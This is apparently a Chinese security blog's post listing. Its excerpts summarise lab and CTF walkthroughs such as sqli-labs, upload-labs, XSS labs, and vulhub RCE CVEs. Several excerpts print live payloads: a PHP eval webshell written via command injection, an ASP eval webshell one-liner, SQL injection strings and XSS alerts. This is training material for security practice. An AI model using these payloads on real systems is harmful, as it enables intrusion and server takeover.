自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(38)
  • 收藏
  • 关注

原创 aspcms webshell漏洞复现

1%25><%25Eval(Request (chr(65)))%25><%25 密码是a。

2024-09-14 18:53:34 389

原创 dedecms靶场(四种webshell姿势)

2.点击【生成】【更新主页HTML】将主页位置修改为【./index.php】点击 【生成静态】点击 【更新主页HTML】 再次访问站点首页可发现变化..

2024-09-14 18:41:02 524

原创 seafaring靶场漏洞测试攻略

seafaring靶场漏洞测试攻略

2024-09-13 14:47:36 726

原创 sqlgun靶场攻略

打开界面。

2024-09-13 11:14:25 503

原创 RickdiculouslyEasy靶场(9个flag)

九个flag

2024-09-11 16:55:37 1356

原创 vulhub spring 远程命令执行漏洞(CVE-2022-22963)

vulhub spring 远程命令执行漏洞(CVE-2022-22963)

2024-09-08 12:38:03 511

原创 vulhub spring 远程命令执行漏洞(CVE-2016-4977)

spring 远程命令执行漏洞(CVE-2016-4977)

2024-09-08 12:10:09 661

原创 vulhub GhostScript 沙箱绕过(CVE-2018-16509)

cd vulhub/ghostscript/CVE-2018-16509 #进入漏洞环境所在目录。docker-compose up -d #启动靶场。docker ps #查看容器信息。

2024-09-07 11:45:00 365

原创 vulhub Thinkphp5 2-rce远程代码执行漏洞

cd /vulhub/thinkphp/2-rce #进入漏洞环境所在目录。docker-compose up -d #启动靶场。docker ps #查看容器信息。

2024-09-07 10:46:32 399

原创 vulhub ThinkPHP5 5.0.23远程代码执行漏洞

up -d。

2024-09-06 18:38:58 743

原创 代码执行漏洞-Log4j2漏洞

代码执行漏洞-Log4j2漏洞

2024-09-06 17:28:51 1264

原创 Pikachu靶场之RCE漏洞详解

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.phpfputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

2024-09-06 14:32:41 555

原创 中间件解析漏洞

IIS apache nginx

2024-09-05 16:02:05 668

原创 Tomato靶机通关攻略

Tomato靶机通关攻略

2024-09-04 14:42:33 546

原创 文件包含PHP伪协议利用方法

文件包含PHP伪协议利用方法

2024-09-03 18:57:51 461

原创 pikachu文件包含漏洞靶场攻略

远程包含漏洞的前提:需要php.ini配置如下:allow_url_fopen=on //默认打开Allow_url_include=on //默认关闭。

2024-09-03 18:33:53 802

原创 hackme靶机通关攻略

上面显示上传到uploads文件夹里。

2024-09-03 18:03:11 204

原创 sqli-labs靶场通关攻略(61-65)

sqli-labs靶场通关攻略(61-65)

2024-09-02 10:24:58 1014

原创 Upload-labs 1-21关 靶场通关攻略(全网最全最完整)

Pass-01步骤一:将一个php文件重命名为jpg文件步骤二:上传1.jpg抓包,将后改为php,放行步骤三:图片右键新建标签页打开图片,复制图片地址去蚁剑连接Pass-02步骤一:上传1.jpg抓包,将后改为php,放行步骤二:图片右键新建标签页打开图片,复制图片地址去蚁剑连接Pass-03步骤一:php文件重命名为1.php5步骤二:上传1.php5文件,图片右键新建标签页打开图片,复制图片地址去蚁剑连接Pass-04步骤一:

2024-08-30 15:33:01 639

原创 sqli-labs靶场通关攻略(51-60)

?sort=1' and updatexml(1,concat(1,(select database())),1) --+?sort=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+判断数据库的第一个字符用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问

2024-08-30 11:41:03 1708

原创 vulhub xxe靶机

vulhub xxe靶机

2024-08-29 17:53:28 762

原创 sqli-labs靶场通关攻略(41-50)

sqli-labs靶场通关攻略(41-50)

2024-08-28 11:54:27 769

原创 CTFHub-SSRF过关攻略

CTFHub-SSRF过关攻略

2024-08-27 14:22:33 600

原创 sqli-labs靶场通关攻略(31-40)

sqli-labs靶场通关攻略(31-40)

2024-08-26 18:55:06 1066

原创 sqli-labs靶场通关攻略(21-30关)

可以看见这里返回了很多信息,包括了自己的Cookie。但是Cookie却是一串奇怪的字符串,看得出来这是bse64编码。解码查看。

2024-08-26 08:48:29 899

原创 sqli-labs靶场通关攻略(11-20关)

判断数据库第一位字符的ascii码是否大于115 页面显示异常 说明不大于 大于114不大于115 说明第一位字符ascii码等于115。判断数据库第一位字符的ascii码是否大于115 页面显示异常 说明不大于 大于114不大于115 说明第一位字符ascii码等于115。说明users表里面的username字段的第一条数据的第一个字符的ascii码为68'D'说明users表里面的username字段的第一条数据的第一个字符的ascii码为68'D'

2024-08-26 08:47:06 1029

原创 sqli-labs靶场通关攻略(1-10关)

判断数据库第一位字符的ascii码是否大于115 页面显示异常 说明不大于 大于114不大于115 说明第一位字符ascii码等于115。判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115。判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115。说明users表里面的username字段的第一条数据的第一个字符的ascii码为68'D'

2024-08-26 08:42:13 452

原创 xss-labs靶场通关详解

xss-labs靶场通关详解

2024-08-23 18:18:24 688

原创 pikachu-xss通关攻略

alert(1)</script>,没有显示,打开源代码查看,发现输入被包括在<script></script>标签中,需要在输入前面输</script>闭合前面的<script>标签。这一关会过滤掉<script>alert(1)</script>,采用大小写绕过,输入<sCript>alert(1)</scriPt>2.输入框输入</script><script>alert(1)</script> 弹出1。输入框输入<script>alert(1)

2024-08-22 17:50:25 882

原创 PostGREsql手工注入(墨者学院)

order by 5的时候没有数据回显,order by 4 有回显数据,所以后端返回到前端的数据字段数为4个。

2024-08-20 19:10:27 410

原创 MongoDB手工注入(墨者学院)

MongoDB手工注入(墨者学院)

2024-08-20 18:27:00 312

原创 Oracle手工注入(墨者学院)

Oracle手工注入(墨者学院)

2024-08-20 17:52:17 1144

原创 Mssql手工注入

第⼆张表:-1'and 1=(select top 1 name from sysobjects where xtype='U' and n。第三张表:-1'and 1=(select top 1 name from sysobjects where xtype='U' and n。第四张表:-1'and 1=(select top 1 name from sysobjects where xtype='U' and n。步骤⼀:在第⼀关使⽤单双引号判断是否存在注⼊,根据报错的回显可知数据类型为字符型。

2024-08-20 17:10:06 477

原创 ACCESS手工注入

ACCESS环境搭建查看此文章。

2024-08-20 12:55:07 442

原创 ACCESS环境搭建

通过网盘分享的文件:1111.zip链接: https://pan.baidu.com/s/1j2um1mtfne42H9mNNDj6Pg?pwd=qikx 提取码: qikx。

2024-08-20 11:25:46 149

原创 Al-Web-1.0 靶机复现

找到根目录/home/www/html/web1x443290o2sdf92213。这个是有两层目录的,uploads禁止访问, 查看上一级的目录文件情况。看到,输入框示意输入数字,出现如下结果说明存在SQL注入。

2024-08-19 17:32:13 166

原创 sqli-labs靶场通关攻略(1-75)

sqli-labs靶场超级细通关攻略

2024-08-14 18:37:04 991 2

原创 ctfhub-web-信息泄露

ctfhub-web-信息泄露

2024-08-13 20:37:44 1088

tomcat-files下载安装包

tomcat-files下载安装包

2024-09-10

xxe-lab-master靶场下载安装包

xxe-lab-master靶场下载安装包

2024-09-10

cms资源商城下载安装包

cms资源商城下载安装包

2024-09-10

bluecms-src靶场安装包

bluecms-src靶场安装包

2024-09-10

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除